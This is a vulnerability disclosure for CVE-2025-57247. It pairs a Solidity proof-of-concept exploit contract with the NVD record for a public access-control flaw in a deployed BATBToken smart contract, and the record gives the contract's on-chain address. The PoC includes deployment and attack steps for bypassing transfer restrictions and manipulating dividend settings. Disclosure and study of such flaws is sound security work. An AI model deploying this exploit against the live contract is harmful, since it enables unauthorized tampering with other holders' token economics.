CVE-2025-57247

// SPDX-License-Identifier: MIT pragma solidity ^0.8.26; // PoC for CVE-2025-57247: BATBToken Access Control Vulnerability // This PoC demonstrates how any user can call whitelist management functions // without proper access control. interface IBATBToken { // Vulnerable functions in the base ERC20 contract function setColdWhiteList(address addr, bool status) external; function setSpecialAddress(address addr) external; function transfer(address to, uint256 amount) external returns (bool); function balanceOf(address account) external view returns (uint256); } contract Exploit { IBATBToken public target; constructor(address _target) { target = IBATBToken(_target); } function exploit() external { // Step 1: Add attacker's address to cold whitelist to bypass transfer restrictions // No access control check - any user can call this target.setColdWhiteList(address(this), true); // Step 2: Manipulate special address settings to disrupt dividend distribution // No access control check - any user can call this target.setSpecialAddress(address(this)); // Step 3: Now attacker can bypass cold time transfer restrictions // and potentially steal tokens or manipulate tokenomics uint256 balance = target.balanceOf(address(this)); if (balance > 0) { target.transfer(msg.sender, balance); } } receive() external payable {} } /* * Attack Steps: * 1. Deploy the Exploit contract with the BATBToken address as constructor argument * 2. Call exploit() on the Exploit contract * 3. The exploit contract will: * a. Call setColdWhiteList() to add itself to the cold whitelist (bypassing restrictions) * b. Call setSpecialAddress() to manipulate dividend distribution * c. Transfer any tokens held by the exploit contract to the attacker * * Note: This vulnerability requires no authentication, no user interaction, * and can be exploited remotely via network (AV:N, PR:N, UI:N). */

{"cve": {"id": "CVE-2025-57247", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:05.697", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The BATBToken smart contract (address 0xfbf1388408670c02f0dbbb74251d8ded1d63b7a2, Compiler Version v0.8.26+commit.8a97fa7a) contains incorrect access control implementation in whitelist management functions. The setColdWhiteList() and setSpecialAddress() functions in the base ERC20 contract are declared as public without proper access control modifiers, allowing any user to bypass transfer restrictions and manipulate special address settings. This enables unauthorized users to circumvent cold time transfer restrictions and potentially disrupt dividend distribution mechanisms, leading to privilege escalation and violation of the contract's intended tokenomics."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://bscscan.com/address/0xfbf1388408670c02f0dbbb74251d8ded1d63b7a2#code", "source": "[email protected]"}, {"url": "https://github.com/RikkaLzw/CVE/blob/main/CVE_BATB-TOKEN.md", "source": "[email protected]"}]}}